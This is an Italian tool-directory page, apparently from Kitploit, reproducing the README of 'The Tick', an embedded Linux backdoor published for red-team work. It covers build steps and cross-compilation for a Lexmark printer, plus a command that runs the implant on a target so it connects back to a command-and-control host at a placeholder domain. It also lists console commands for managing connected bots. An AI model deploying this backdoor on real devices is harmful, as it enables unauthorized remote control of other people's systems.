Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
thetick — A simple embedded Linux backdoor. | Kitploit
Strumenti/GitHubGitHub/nccgroup/thetick
Embedded Systems SecurityPersistence MechanismsPost-ExploitationCommand and ControlRed TeamingRemote Access Tool
GitHubnccgroup/thetick

thetick

A simple embedded Linux backdoor.

Vedi Repository
198345 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Sito web

The Tick

Una semplice backdoor Linux embedded.

  • The Tick
    • Compilazione
    • Installazione
    • Utilizzo
    • Media

Schermata 1

Compilazione

The Tick dipende solo da libcurl, quindi assicurati di avere il pacchetto di sviluppo corrispondente. Ad esempio, sulle distribuzioni basate su Debian dovresti fare quanto segue:

root@kitploit:~
sudo apt-get install libcurl-dev

Una volta installate le dipendenze, esegui semplicemente il makefile:

root@kitploit:~
cd src
make clean
make

Una volta che il comando "make" è stato eseguito completamente, il binario compilato si trova nella cartella "bin". Questo è il binario che devi eseguire sulla macchina target per controllarla da remoto.

Quando si effettua la cross-compilazione per piattaforme supportate, la risoluzione delle dipendenze e la compilazione vengono eseguite automaticamente. Attualmente l'unica piattaforma di cross-compilazione supportata è la stampante Lexmark CX310DN, ma in seguito verranno aggiunti altri dispositivi. Consulta il makefile per maggiori dettagli.

La console di comando e controllo è scritta in Python e quindi non necessita di compilazione.

Installazione

Ottenere la persistenza sulla backdoor dipende fortemente dalla piattaforma target e pertanto non è documentato qui.

Sulla macchina target, esegui il binario della backdoor con i seguenti argomenti:

root@kitploit:~
./ticksvc ADDR PORT

Dove "ADDR" e "PORT" devono essere sostituiti con l'indirizzo IP e la porta in cui la console di comando e controllo sarà in ascolto. La porta predefinita è 5555.

La console di comando e controllo non richiede installazione, ma potrebbe avere dipendenze non risolte. Esegui il seguente comando per assicurarti che tutte le dipendenze siano installate correttamente (nota: questo non richiede sudo):

root@kitploit:~
pip install --upgrade -r requirements.txt

Nella maggior parte degli ambienti desktop Linux, il seguente file "Tick.desktop" creerà un'icona su cui puoi fare doppio clic per eseguire la console:

root@kitploit:~
[Desktop Entry]
Encoding=UTF-8
Value=1.0
Type=Application
Name=The Tick
GenericName=The Tick
Comment=An embedded Linux backdoor
Icon=/opt/thetick/doc/logo.png
Exec=/opt/thetick/tick.py
Terminal=true
Path=/opt/thetick/

La posizione esatta del file Tick.desktop può variare tra le distribuzioni Linux, ma in generale posizionarlo sul desktop dovrebbe funzionare. Assicurati di modificare il percorso con la posizione in cui hai scaricato The Tick (/opt/thetick nell'esempio precedente).

Utilizzo

Per eseguire il binario della backdoor sulla piattaforma target, imposta l'hostname e la porta del server di controllo come opzioni della riga di comando. Ad esempio:

root@kitploit:~
./ticksvc control.example-domain.com 5555

Sul server di controllo, potresti voler eseguire la console all'interno di un'istanza di GNU screen o simile:

root@kitploit:~
sudo apt-get install screen
screen -S thetick ./thetick.py

In questo modo puoi scollegarti dalla console premendo Control+A seguito da D. Puoi tornare alla console in seguito in questo modo:

root@kitploit:~
screen -r thetick

La console ti avviserà quando un nuovo bot si connette. Usa il comando "bots" per mostrare i bot attualmente connessi e il comando "use" per selezionare un bot con cui lavorare. Il comando "help" mostra il manuale utente.

Ecco alcune schermate che illustrano di cosa è capace la console:

Schermata 2

Schermata 3

Media

The Tick è stato menzionato nella seguente presentazione alla 44Con di Daniel Romero e Mario Rivas:

Scarica lo strumento